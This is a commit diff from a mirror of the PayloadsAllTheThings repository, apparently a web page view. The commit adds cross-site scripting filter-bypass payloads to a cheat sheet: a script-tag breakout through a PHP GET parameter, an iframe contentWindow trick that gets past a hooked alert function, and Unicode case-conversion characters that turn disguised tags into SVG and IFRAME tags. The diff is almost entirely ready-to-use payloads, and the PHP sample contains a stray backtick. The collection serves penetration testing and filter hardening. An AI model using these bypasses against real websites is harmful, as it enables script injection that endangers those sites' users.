mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 10:56:10 +00:00
XSS Unicode update
This commit is contained in:
parent
b01c249da8
commit
c9e13fcc36
@ -368,6 +368,16 @@ Bypass quotes for string
|
|||||||
String.fromCharCode(88,83,83)
|
String.fromCharCode(88,83,83)
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypass quotes in script tag
|
||||||
|
```
|
||||||
|
http://localhost/bla.php?test=</script><script>alert(1)</script>
|
||||||
|
<html>
|
||||||
|
<script>
|
||||||
|
<?php echo 'foo="text '.$_GET['test'].'";';`?>
|
||||||
|
</script>
|
||||||
|
</html>
|
||||||
|
```
|
||||||
|
|
||||||
Bypass dot filter
|
Bypass dot filter
|
||||||
```
|
```
|
||||||
<script>window['alert'](document['domain'])<script>
|
<script>window['alert'](document['domain'])<script>
|
||||||
@ -421,6 +431,28 @@ Bypass using an alternate way to execute an alert
|
|||||||
<script>top['alert'](3)</script>
|
<script>top['alert'](3)</script>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypass using an alternate way to trigger an alert
|
||||||
|
```
|
||||||
|
var i = document.createElement("iframe");
|
||||||
|
i.onload = function(){
|
||||||
|
i.contentWindow.alert(1);
|
||||||
|
}
|
||||||
|
document.appendChild(i);
|
||||||
|
|
||||||
|
// Bypassed security
|
||||||
|
XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
|
||||||
|
var proxy = obj[name];
|
||||||
|
obj[name] = function () {
|
||||||
|
if (exec_original) {
|
||||||
|
return proxy.apply(this, arguments);
|
||||||
|
}
|
||||||
|
};
|
||||||
|
XSSObject.lockdown(obj, name);
|
||||||
|
};
|
||||||
|
XSSObject.proxy(window, 'alert', 'window.alert', false);
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
Bypass ';' using another character
|
Bypass ';' using another character
|
||||||
```
|
```
|
||||||
'te' * alert('*') * 'xt';
|
'te' * alert('*') * 'xt';
|
||||||
@ -465,6 +497,17 @@ E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert
|
|||||||
%EF%BC%9C becomes <
|
%EF%BC%9C becomes <
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypass using unicode converted to uppercase
|
||||||
|
```
|
||||||
|
İ (%c4%b0).toLowerCase() => i
|
||||||
|
ı (%c4%b1).toUpperCase() => I
|
||||||
|
ſ (%c5%bf) .toUpperCase() => S
|
||||||
|
K (%E2%84%AA).toLowerCase() => k
|
||||||
|
|
||||||
|
<ſvg onload=... > become <SVG ONLOAD=...>
|
||||||
|
<ıframe id=x onload=>.toUpperCase() become <IFRAME ID=X ONLOAD=>
|
||||||
|
```
|
||||||
|
|
||||||
Bypass using overlong UTF-8
|
Bypass using overlong UTF-8
|
||||||
```
|
```
|
||||||
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
|
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
|
||||||
|
Loading…
Reference in New Issue
Block a user